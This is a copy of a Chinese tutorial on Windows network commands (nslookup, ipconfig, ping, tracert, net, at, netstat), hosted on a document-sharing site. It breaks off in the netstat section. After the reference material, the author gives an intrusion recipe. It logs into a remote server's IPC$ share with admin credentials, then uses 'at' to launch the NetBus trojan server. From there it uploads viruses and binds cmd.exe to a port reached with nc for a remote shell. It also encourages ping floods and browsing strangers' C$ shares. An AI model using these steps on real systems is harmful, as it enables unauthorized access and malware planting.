nslookupipconfig基础网络命令.docx
《nslookupipconfig基础网络命令.docx》由会员分享,可在线阅读,更多相关《nslookupipconfig基础网络命令.docx(18页珍藏版)》请在冰豆网上搜索。
nslookupipconfig基础网络命令
Nslookup显示可用来诊断域名系统(DNS)基础结构的信息。
使用此工具之前,您应当熟悉DNS的工作原理。
只有在已安装TCP/IP协议的情况下才可以使用Nslookup命令行工具。
语法
nslookup[-SubCommand...][{ComputerToFind|[-Server]}]
参数
-SubCommand...
将一个或多个nslookup子命令指定为命令行选项。
有关子命令的列表,请参阅“相关主题”。
ComputerToFind
如果未指定其它服务器,就使用当前默认DNS名称服务器查阅ComputerToFind的信息。
要查找不在当前DNS域的计算机,请在名称上附加句点。
-Server
指定将该服务器作为DNS名称服务器使用。
如果省略了-Server,将使用默认的DNS名称服务器。
{help|?
}
显示nslookup子命令的简短总结。
注释
如果ComputerToFind是IP地址,并且查询类型为A或PTR资源记录类型,则返回计算机的名称。
如果ComputerToFind是一个名称,并且没有跟踪期,则向该名称添加默认DNS域名。
此行为取决于下面set子命令的状态:
domain、srchlist、defname和search。
如果键入连字符(-)代替ComputerToFind,命令提示符更改为nslookup交互式模式。
命令行长度必须少于256个字符。
Nslookup有两种模式:
交互式和非交互式。
如果仅需要查找一块数据,请使用非交互式模式。
对于第一个参数,键入要查找的计算机的名称或IP地址。
对于第二个参数,键入DNS名称服务器的名称或IP地址。
如果省略第二个参数,nslookup使用默认DNS名称服务器。
如果需要查找多块数据,可以使用交互式模式。
为第一个参数键入连字符(-),为第二个参数键入DNS名称服务器的名称或IP地址。
或者,省略两个参数,则nslookup使用默认DNS名称服务器。
下面是一些有关在交互式模式下工作的提示:
要随时中断交互式命令,请按CTRL+B。
要退出,请键入exit。
要将内置命令当作计算机名,请在该命令前面放置转义字符(\)。
将无法识别的命令解释为计算机名。
如果查找请求失败,nslookup将打印错误消息。
下表列出可能的错误消息。
错误消息说明
Timedout重试一定时间和一定次数之后,服务器没有响应请求。
可以通过settimeout子命令设置超时期。
而利用setretry子命令设置重试次数。
Noresponsefromserver服务器上没有运行DNS名称服务器。
Norecords尽管计算机名有效,但是DNS名称服务器没有计算机当前查询类型的资源记录。
查询类型使用setquerytype命令指定。
Nonexistentdomain计算机或DNS域名不存在。
Connectionrefused
or
Networkisunreachable
无法与DNS名称服务器或指针服务器建立连接。
该错误通常发生在ls和finger请求中。
ServerfailureDNS名称服务器发现在其数据库中内部不一致而无法返回有效应答。
RefusedDNS名称服务器拒绝为请求服务。
FormaterrorDNS名称服务器发现请求数据包的格式不正确。
可能表明nslookup中存在错误。
Ipconfig显示所有当前的TCP/IP网络配置值、刷新动态主机配置协议(DHCP)和域名系统(DNS)设置。
使用不带参数的ipconfig可以显示所有适配器的IP地址、子网掩码、默认网关。
语法
ipconfig[/all][/renew[Adapter]][/release[Adapter]][/flushdns][/displaydns][/registerdns][/showclassidAdapter][/setclassidAdapter[ClassID]]
参数
/all
显示所有适配器的完整TCP/IP配置信息。
在没有该参数的情况下ipconfig只显示IP地址、子网掩码和各个适配器的默认网关值。
适配器可以代表物理接口(例如安装的网络适配器)或逻辑接口(例如拨号连接)。
/renew[adapter]
更新所有适配器(如果未指定适配器),或特定适配器(如果包含了Adapter参数)的DHCP配置。
该参数仅在具有配置为自动获取IP地址的网卡的计算机上可用。
要指定适配器名称,请键入使用不带参数的ipconfig命令显示的适配器名称。
/release[adapter]
发送DHCPRELEASE消息到DHCP服务器,以释放所有适配器(如果未指定适配器)或特定适配器(如果包含了Adapter参数)的当前DHCP配置并丢弃IP地址配置。
该参数可以禁用配置为自动获取IP地址的适配器的TCP/IP。
要指定适配器名称,请键入使用不带参数的ipconfig命令显示的适配器名称。
/flushdns
清理并重设DNS客户解析器缓存的内容。
如有必要,在DNS疑难解答期间,可以使用本过程从缓存中丢弃否定性缓存记录和任何其他动态添加的记录。
/displaydns
显示DNS客户解析器缓存的内容,包括从本地主机文件预装载的记录以及由计算机解析的名称查询而最近获得的任何资源记录。
DNS客户服务在查询配置的DNS服务器之前使用这些信息快速解析被频繁查询的名称。
/registerdns
初始化计算机上配置的DNS名称和IP地址的手工动态注册。
可以使用该参数对失败的DNS名称注册进行疑难解答或解决客户和DNS服务器之间的动态更新问题,而不必重新启动客户计算机。
TCP/IP协议高级属性中的DNS设置可以确定DNS中注册了哪些名称。
/showclassidadapter
显示指定适配器的DHCP类别ID。
要查看所有适配器的DHCP类别ID,可以使用星号(*)通配符代替Adapter。
该参数仅在具有配置为自动获取IP地址的网卡的计算机上可用。
/setclassidAdapter[ClassID]
配置特定适配器的DHCP类别ID。
要设置所有适配器的DHCP类别ID,可以使用星号(*)通配符代替Adapter。
该参数仅在具有配置为自动获取IP地址的网卡的计算机上可用。
如果未指定DHCP类别ID,则会删除当前类别ID。
/?
在命令提示符显示帮助。
注释
ipconfig等价于winipcfg,后者在WindowsMillenniumEdition、Windows98和Windows95上可用。
尽管WindowsXP没有提供象winipcfg命令一样的图形化界面,但可以使用“网络连接”查看和更新IP地址。
要做到这一点,请打开网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取IP地址的计算机。
它使用户可以确定哪些TCP/IP配置值是由DHCP、自动专用IP地址(APIPA)和其他配置配置的。
如果Adapter名称包含空格,请在该适配器名称两边使用引号(即"AdapterName")。
对于适配器名称,ipconfig可以使用星号(*)通配符字符指定名称为指定字符串开头的适配器,或名称包含有指定串的适配器。
例如,Local*可以匹配所有以字符串Local开头的适配器,而*Con*可以匹配所有包含字符串Con的适配器。
只有当网际协议(TCP/IP)协议在网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有适配器的基本TCP/IP配置,请键入:
ipconfig
要显示所有适配器的完整TCP/IP配置,请键入:
ipconfig/all
仅更新“本地连接”适配器的由DHCP分配IP地址的配置,请键入:
ipconfig/renew"LocalAreaConnection"
要在排除DNS的名称解析故障期间清理DNS解析器缓存,请键入:
ipconfig/flushdns
要显示名称以Local开头的所有适配器的DHCP类别ID,请键入:
ipconfig/showclassidLocal*
要将“本地连接”适配器的DHCP类别ID设置为TEST,请键入:
ipconfig/setclassid"LocalAreaConnection"TEST
1.ping:
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage:
ping[-t][-a][-ncount][-lsize][-f][-iTTL][-vTOS]
[-rcount][-scount][[-jhost-list][-khost-list]]
[-wtimeout]destination-list
Options:
-tPingthespecifedhostuntilinterrupted.(除非人为中止,否则一直ping下去)
-aResolveaddressestohostnames.(把IP转为主机名)
-ncountNumberofechorequeststosend.(响应请求的数量)
-lsizeSendbuffersize.(封包的大小)
-fSetDon'tFragmentflaginpacket.(信息包中无碎片)
-iTTLTimeToLive.(时间)
-vTOSTypeOfService.(服务类型)
-rcountRecordrouteforcounthops.
-scountTimestampforcounthops.
-jhost-listLoosesourceroutealonghost-list.
-khost-listStrictsourceroutealonghost-list.(较严格的……唉,怎么译好……算了,放着吧)
-wtimeoutTimeoutinmillisecondstowaitforeachreply.(timeout的时间)
比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping得到的结果都是requesttimeout。
那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
2.winipcfg:
这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?
――哈,不好意思,跑题了,但――接着跑两句:
可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。
这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。
3.tracert:
是验证通往远程主机路径的实用程序
用法:
tracert[-d][-hmaximum_hops][-jhost-list][-wtimeout]target_name
参数:
-dDonotresolveaddressestohostnames.(不将IP转为主机名)
-hmaximum_hopsMaximumnumberofhopstosearchfortarget.(最大跟踪数量)
-jhost-listLoosesourceroutealonghost-list.
-wtimeoutWaittimeoutmillisecondsforeachreply.(timeout的时间)
最简单的用法就是tracerthostname其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。
TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?
我略为解释一下吧:
跟踪通往210.142.192.130的路由,最大30:
第一行:
*&^%&*我就是从这里出去的(呵,真不想说^&^)
第四行:
是不是快要出国了呢?
第九行:
呀!
这是日本鬼子的地盘……
4.net:
这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢
这个命令的语法是:
可用的命令包括:
NETACCOUNTSNETHELPNETSHARE
NETCOMPUTERNETHELPMSGNETSTART
NETCONFIGNETLOCALGROUPNETSTATISTICS
NETCONFIGSERVERNETNAMENETSTOP
NETCONFIGWORKSTATIONNETPAUSENETTIME
NETCONTINUENETPRINTNETUSE
NETFILENETSENDNETUSER
NETGROUPNETSESSIONNETVIEW
NETHELPSERVICES列出用户可以启动的网络服务。
NETHELPSYNTAX解释如何阅读NETHELP语法行。
NETHELPcommandMORE用于逐屏显示帮助。
我可就不逐样解释了――这样会把我的手指累坏,就说说常用的两个命令吧
view
这个命令的语法是:
NETVIEW[computername/DOMAIN[:
domainname]]
NETVIEW/NETWORK:
NW[computername]
NETVIEW用于显示一个计算机上共享资源的列表。
当不带选项使用本命令时,
它就会显示当前域或网络上的计算机上的列表。
computername指用户希望浏览其共享资源的计算机。
/DOMAIN:
domainname指定用户希望浏览有效的计算机所在的域。
如果省略了域名,
就会显示局域网络上的所有域。
/NETWORK:
NW显示NetWare网络上所有可用的服务器。
如果指定了一个计算
机名,就会显示NetWare网络中那个计算机上的可用资源。
至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行
netview***.***.**.***就可以了
use
这个命令的语法是:
NETUSE[devicename*][computernamesharename[volume][password*]]
[/USER:
[domainname]username]
[[/DELETE][/PERSISTENT:
{YESNO}]]
NETUSE[devicename*][password*]][/HOME]
NETUSE[/PERSISTENT:
{YESNO}]
NETUSE用于将计算机与共享的资源相连接,或者切断计算机与共享资源的
连接。
当不带选项使用本命令时,它会列出计算机的连接。
devicename指定一个名字以便与资源相连接,或者指定要切断的设备。
有两种类型
的设备名:
磁盘驱动器(D:
至Z:
)和打印机(LPT1:
至LPT3:
)。
输入
一个星号来代替一个指定的设备名可以分配下一个可用设备名。
computername指控制共享资源的计算机的名字。
如果计算机名中包含有空字符,
就要将双反斜线()和计算机名一起用引号("")括起来。
计算机名
可以有1到15个字符。
sharename指共享资源的网络名字。
volume指定一个服务器上的NetWare卷。
用户必须安装Netware的客户服务
(WindowsNT工作站)或者Netware的网关服务(WindowsNT服务
器)并使之与NetWare服务器相连。
password指访问共享资源所需要的密码。
*进行密码提示。
当在密码提示符下输入密码时,密码是不会显示的。
/USER指定连接时的一个不同的用户名。
domainname指定另外一个域。
如果缺省域,就会使用当前登录的域。
username指定登录的用户名。
/HOME将用户与他们的宿主目录相连。
/DELETE取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT控制对永久网络连接的使用。
其缺省值是最近使用的设置。
YES在连接产生时保存它们,并在下次登录时恢复它们。
NO不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被
恢复。
可以使用/DELETE选项开关来删除永久连接。
PS:
前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:
在浏览器中输入file:
///***.***.**.***c¥
则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。
各位不妨试试,还可试试举一反三……
5.at:
排定在特定的日期和时间运行某些命令和程序。
运行AT命令之前必须先启动Schedule服务。
瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。
C:
》netstartschedule
Schedule正在启动服务.....
Schedulw服务启动成功。
AT[computername][[id][/DELETE]/DELETE[/YES]]
AT[computername]time[/INTERACTIVE]
[/EVERY:
date[,...]/NEXT:
date[,...]]"command"
computername指定远程计算机。
如果省略这个参数
命令会被排定在本机上运行。
id指定给排定进度命令的识别号。
/delete删除某个已排定进度的命令。
如果省略标识,计算机上所有已排定进度的
命令都会被删除。
/yes用于删除所有作业,且不想在运行删除时显示确认
信息。
time指定命令运行的时间。
/interactive允许作业在运行时,与用户通过桌面交互。
/every:
date[,...]指定在每周或每月的某日(或某几日)运行命令。
如果省略日期,则默认为在每月的本日运行。
/next:
date[,...]指定在下一个指定日期(如,下周三),运行命令。
如果省略日期,则默认为在每月的本日运行。
"command"准备运行的WindowsNT命令或批处理文件。
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
1利用管理员登陆到目的服务器,方法为:
netusex.x.x.xipc¥"adminpwd"/user:
"adminuser"(这里具体方法可参见KILLUSA的文章《HOWTOGETINNT》)
2利用ntsrv.exe启动远程:
netsvcx.x.x.xschedule/start
3利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
atx.x.x.x00:
00ntsrv.exe/port:
64321
其中00:
00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!
比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Startprogram",键入完整路径,就ok了!
第二种方法是利用netbus的“Appredirect”功能,启动远程telnet服务,如下:
在netbus中击“Appredirect”,键入"C:
》winntsystem32cmd.exe",Port为:
4321,服务就启动了,然后在本地运行:
ncx.x.x.x4321,出现dos启动的画面就表示连接成功:
Microsoft(R)WindowsNT(TM)
(C)Copyright1985-1996MicrosoftCorp.
C:
》
注:
这里有一小段是抄KILLUSA的文章――别找我要稿费啊^&^
stat这是一个观察网络连接状态的实用工具。
它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。
这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。
网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:
DisplaysprotocolstatisticsandcurrentTCP/IPnetworkconnections.(显示协议与当前网络连接)
NETSTAT[-a][-e][-n][-s][-pproto][-r][interval]
-aDisplaysallconnectionsandlisteningports.(显示所有连接和监听端口)
-eDisplaysEthernetstatistics.Thismaybecombinedwiththe-s
option.(显示以太连接,可以与-s连用)
-nDisplaysaddressesandportnumbersinnumeri
++++++++++++++++++++++++++++++++++++++++++++++
升级会员 